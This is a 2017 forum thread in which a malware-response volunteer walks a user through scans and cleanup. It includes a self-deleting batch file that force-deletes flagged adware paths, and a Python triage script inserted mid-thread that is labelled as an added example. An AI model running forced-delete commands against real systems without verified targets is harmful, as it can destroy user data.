Posted 23 May 2017 - 07:09 AM

Good morning Satchfan.  Agreed - much better, thanks to you.

 

MBAM scan came back clean:

 

Scan results:

Result: Completed
Objects Scanned: 451032
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 4 min, 7 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Disabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 0
(No malicious items detected)

Physical Sector: 0
(No malicious items detected)


(end)



#9 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts

Posted 23 May 2017 - 07:12 AM

The last log was incomplete; drinking coffee now.

 

MBAM Log:

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 5/23/17
Scan Time: 7:02 AM
Log File:
Administrator: Yes

-Software Information-
Version: 3.1.2.1733
Components Version: 1.0.122
Update Package Version: 1.0.2003
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: PC\Admin

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 451032
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 4 min, 7 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Disabled
PUM: Enabled

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 0
(No malicious items detected)

Registry Value: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 0
(No malicious items detected)

Physical Sector: 0
(No malicious items detected)


(end)



#10 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • Gender:Female
  • Location:Devon, UK

Posted 23 May 2017 - 08:24 AM

Let’s run an online scan to be sure nothing is left.


Run ESET Online Scan

Note: This may take a long time so please be patient.

IMPORTANT: Please make sure you uncheck the box next to Remove found threats. Eset will detect anything that looks even slightly suspicious, which could include legitimate program files. If you do not uncheck the box, Eset will automatically remove all suspicious files which could leave some of your software inoperable.

Note: You can use Internet Explorer, FireFox or Chrome for this scan. You will however need to disable your currently installed Anti-Virus; how to do so can be read here.

Hold down Control and click on the following link to open ESET OnlineScan in a new window.

ESET OnlineScan

  • click the Run Eset online Scanner button
  • for alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • click on esetinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • double click on the Eset installer icon on your desktop.
  • check Yes, I accept the Terms of Use
  • click the Start button
  • accept any security warnings from your browser
  • check Enable detection of potentially unwanted applications
  • click Advanced settings and select the following:
    • scan archives
    • scan for potentially unsafe applications
    • enable Anti-Stealth technology
    Note: Do not check Remove found threats
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • when the scan completes, push List of found threats
  • push Export to Text file and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
    Note - if ESET doesn't find any threats, no report will be created.
  • push the back button.
  • push Finish

When the scan is complete:

If no threats were found:

  • put a checkmark in "Uninstall application on close"
  • close program
  • report to me that nothing was found.

If threats were found:

  • click on "list of threats found"
  • click on "export to text file" and save it as ESET results and save to the desktop
  • click on back
  • put a checkmark in "Uninstall application on close"
  • click on finish
  • close program
  • copy and paste the report here

Can you tell me if there are any remaining problems.

 

Thanks

Satchfan

 




#11 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts

Posted 23 May 2017 - 09:35 AM

Hi Satchfan, good call.  As directed, scanned, but not cleaned yet.

 

 

Eset results:

C:\ProgramData\Avira\My Avira\Temp\antivirus.exe    a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application    
C:\Qoobox\Quarantine\C\Users\Admin\AppData\Local\Ektion\sgbdg.exe.vir    Win32/Boaxxe.EJ trojan    
C:\TDSSKiller_Quarantine\21.05.2017_16.10.27\susp0000\file0000\tsk0000.dta    Win32/Boaxxe.EJ trojan    
C:\TDSSKiller_Quarantine\21.05.2017_16.10.27\susp0001\file0000\tsk0000.dta    Win32/Boaxxe.EJ trojan    
C:\Users\All Users\Avira\My Avira\Temp\antivirus.exe    a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application    
C:\Windows\SysWOW64\Adobe\Shockwave 12\gt.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application


#12 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 23 May 2017 - 03:34 PM

Let's get rid of those.

Please copy all text in the code box below and paste it into Notepad:

@echo off
del /f /s /q "C:\ProgramData\Avira\My Avira\Temp\antivirus.exe"
del /f /s /q "C:\Users\All Users\Avira\My Avira\Temp\antivirus.exe"
del /f /s /q "C:\Windows\SysWOW64\Adobe\Shockwave 12\gt.exe"
del %0

  • save the Notepad file to your desktop and name it delfiles.bat
  • save type as "All Files"
  • on your desktop, double-click on delfiles.bat to run it, (a black CMD window will flash, then disappear - this is normal).

The files/folders, if found, will have been deleted and the "delfiles.bat" file will also be deleted.

The rest of the Online scan is only reporting backups created during the course of previous fixes: C:\Qoobox\Quarantine\, and/or other quarantined files that can't harm you unless you choose to perform a manual restore. Whatever is in these folders can't cause any harm and will be removed when we tidy up.

Can you tell me if there are any more problems?

Satchfan
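As an added example (not code from the thread or from any of the tools named in it), the script below applies the triage rule satchfan states in the reply above to the ESET text export shown earlier: hits under the quarantine folders left by ComboFix (C:\Qoobox) and TDSSKiller are inert backups, the rest are live files, and those go into a delfiles.bat written with plain ASCII quotes. The sample report is constructed from the lines Windfarm posted; the quarantine roots are assumed from those same lines.

```python
r"""Triage an ESET Online Scanner text export and draft the cleanup batch file.
Added example, not code from the thread. It applies the reasoning in the reply
above: hits under quarantine folders left by earlier tools (ComboFix's
C:\Qoobox, TDSSKiller_Quarantine) are inert backups; live paths go in the batch."""
import re

# Quarantine roots named in the thread; compared case-insensitively.
QUARANTINE_ROOTS = (r"c:\qoobox\quarantine", r"c:\tdsskiller_quarantine")

# Constructed sample: the report lines posted in the thread above.
SAMPLE_REPORT = r"""
C:\ProgramData\Avira\My Avira\Temp\antivirus.exe    a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application
C:\Qoobox\Quarantine\C\Users\Admin\AppData\Local\Ektion\sgbdg.exe.vir    Win32/Boaxxe.EJ trojan
C:\TDSSKiller_Quarantine\21.05.2017_16.10.27\susp0000\file0000\tsk0000.dta    Win32/Boaxxe.EJ trojan
C:\Windows\SysWOW64\Adobe\Shockwave 12\gt.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application
"""


def parse_report(text):
    """Yield (path, detection) pairs; ESET separates the columns with a tab or
    a run of spaces, while paths may contain single spaces ("My Avira")."""
    for line in text.splitlines():
        cols = re.split(r"\t+| {2,}", line.strip(), maxsplit=1)
        if len(cols) == 2:
            yield cols[0], cols[1].strip()


def is_quarantined(path):
    """True if the path sits under a known quarantine/backup folder."""
    p = path.lower().rstrip("\\")
    return any(p == root or p.startswith(root + "\\") for root in QUARANTINE_ROOTS)


def triage(text):
    """Split the report into live hits (act on) and quarantined backups (ignore)."""
    live, backups = [], []
    for path, detection in parse_report(text):
        (backups if is_quarantined(path) else live).append((path, detection))
    return {"live": live, "quarantined": backups}


def build_delfiles_bat(live_hits):
    """Draft a delfiles.bat like the thread's, using plain ASCII double quotes:
    curly quotes copied from a web page make cmd.exe look for the wrong name."""
    lines = ["@echo off"]
    # /f forces read-only files, /q suppresses the prompt; a full path needs no /s.
    lines += ['del /f /q "%s"' % path for path, _ in live_hits]
    lines.append("del %0")  # the batch deletes itself, as in the thread
    return "\r\n".join(lines) + "\r\n"
```

Review the "live" list by hand before running the generated batch; the script only separates quarantine backups from other hits, it does not judge whether a live hit is malicious.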


#13 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  • Local time:06:57 AM

Posted 23 May 2017 - 05:13 PM

Thanks Satchfan. Ran the batch file - no issues.

So far as I can tell there are no additional problems, no signs of infection and no unexpected behavior.



#14 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 23 May 2017 - 05:26 PM

Glad all seems good.

It's late here now so I won't reply further tonight.

If I hear nothing else regarding problems I'll send instructions to tidy up the tools we've used in the morning (GMT).

Satchfan




#15 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 24 May 2017 - 05:34 PM

As I’ve heard nothing, I’ll assume that all is well.

Now that you’re free from malware, as long as it seems to be running well, please follow these steps to tidy up your computer and decrease the likelihood of getting infected again:

Enable System Restore

  • According to your log, System Restore was disabled. Please check that it is enabled:
  • click on Start, right-click on Computer and then click on Properties
  • in the left panel, click System protection, (if you're prompted for an administrator password or confirmation, type the password or provide confirmation)
  • under “Protection Settings”, select your system disk and then click Configure
  • select Restore system settings and previous versions of files and then click OK twice.

===================================================

Uninstall Combofix

Follow these steps to uninstall Combofix

  • click START then RUN
  • now type Combofix /uninstall in the runbox and click OK.

Note the space between the X and the /; it needs to be there.

[Screenshot: CFuninstall.jpg]

  • please follow the prompts to uninstall Combofix.
  • once it's finished uninstalling itself you will receive a message saying Combofix was uninstalled successfully.

===================================================

Uninstall AdwCleaner

  • double click on adwcleaner.exe to run the tool
  • click on Uninstall
  • confirm with Yes.

===================================================

Download & run Delfix

  • download Delfix from here to remove many of the tools we've used during the cleaning process.
  • ensure “Remove disinfection tools” is checked.

Also place a checkmark next to:


o    Create registry backup
o    Purge system restore


  • click the Run button.

You can delete all other logs and programs we’ve used that are on your desktop. Just click on them and press Delete.

===================================================

Recommended programs

SpywareBlaster. SpywareBlaster protects against bad ActiveX; it immunizes your PC against them. It blocks over 11,000 bad sites and uses no resources of your computer.

======================

Update and run Malwarebytes. This really is an excellent program that you should also update and run on a regular basis, probably weekly.

======================

It’s important to keep programs up to date so that malware doesn't exploit any old security flaws.

FileHippo Update Checker is an extremely helpful program that will tell you which of your programs need to be updated.

======================

Download WOT

Web of Trust warns you about risky websites that try to scam visitors, deliver malware or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites, helping you avoid the dangerous sites:

green if it's safe
yellow for caution
red for unsafe

You can download the WOT add-on for Firefox, Chrome, Internet Explorer, Opera, and Safari browsers. It does not slow down your browsing experience, it is easy to use and free. Just click “Download” and you are ready to go!

======================

MVPS Hosts file replaces your current HOSTS file with one containing well known ad sites and other bad sites. Basically, this prevents your computer from connecting to those sites by redirecting them to 127.0.0.1 which is your local computer, meaning it will be difficult to infect yourself in the future.

A couple of links with information here and here which can answer any questions you might have about installing/using it.

======================

Unchecky

Be careful when downloading free software. Many free programs come bundled with adware, many of which cause redirects/popups and verge on being malware. There is a program that automatically "unchecks" the boxes you may not notice when downloading programs.

Download and install Unchecky.

===================================================

I also recommend that you read the following:

Best Practices for Safe Computing - Prevention of Malware Infection by miekiemoes

Simple and easy ways to keep your computer safe and secure on the Internet by Lawrence Abrams

I will keep this open for 24 hours in case you have any problems, after which I’ll close the topic.

Safe computing

Satchfan

